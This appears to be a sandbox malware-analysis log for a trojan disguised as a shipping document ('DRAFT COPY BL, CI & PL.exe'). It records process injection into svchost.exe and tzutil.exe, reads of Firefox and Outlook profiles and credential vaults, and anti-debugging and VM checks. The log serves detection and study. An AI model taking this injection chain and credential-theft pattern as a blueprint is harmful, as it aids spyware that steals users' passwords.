                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: String function: 00937DE1 appears 35 times
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: String function: 00950AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039DEA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0395B970 appears 262 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039B7E54 appears 107 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039A5130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 039EF290 appears 103 times
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1705746306.00000000030C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DRAFT COPY BL, CI & PL.exe
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1706586938.00000000039CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DRAFT COPY BL, CI & PL.exe
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099A06A GetLastError,FormatMessageW | 0_2_0099A06A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009881CB AdjustTokenPrivileges,CloseHandle | 0_2_009881CB
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 0_2_009887E1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 0_2_0099B3FB
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 0_2_009AEE0D
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099C397 CoInitialize,CoCreateInstance,CoUninitialize | 0_2_0099C397
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00934E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 0_2_00934E89
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | File created: C:\Users\user\AppData\Local\Temp\autBF19.tmp
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Command line argument: 0`0_2_009347D0
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tzutil.exe, 00000006.00000003.2402962604.0000000003301000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.0000000003301000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.00000000032DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DRAFT COPY BL, CI & PL.exe | ReversingLabs: Detection: 44%
                Source: unknown | Process created: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: ntmarta.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DRAFT COPY BL, CI & PL.exe | Static file information: File size 1213952 > 1048576
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oFlOzErifOVgUf.exe, 00000005.00000000.2145067730.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: DRAFT COPY BL, CI & PL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00934B37 LoadLibraryA,GetProcAddress | 0_2_00934B37
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | File created: \draft copy bl, ci & pl.exe
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_009348D7
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_009B5376
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00953187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00953187
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | API/Special instruction interceptor: Address: 10D982C
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\tzutil.exe | API coverage: 2.8 %
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe TID: 4228 | Thread sleep time: -50000s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4284 | Thread sleep count: 37 > 30
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4284 | Thread sleep time: -74000s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe | Last function: Thread delayed (2 occurrences)
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099C6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00993B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F8C8A0 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000002.1708587090.0000000000F71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe4
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520725099.000000000116E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO(gNe
                Source: tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                Source: firefox.exe, 00000007.00000002.2519674346.00000156FC3EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\tzutil.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417AA3 LdrLoadDll
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009A3F09 BlockInput
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00933B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00965A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00934B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_010D8488 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_010D9A98 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_010D9AF8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
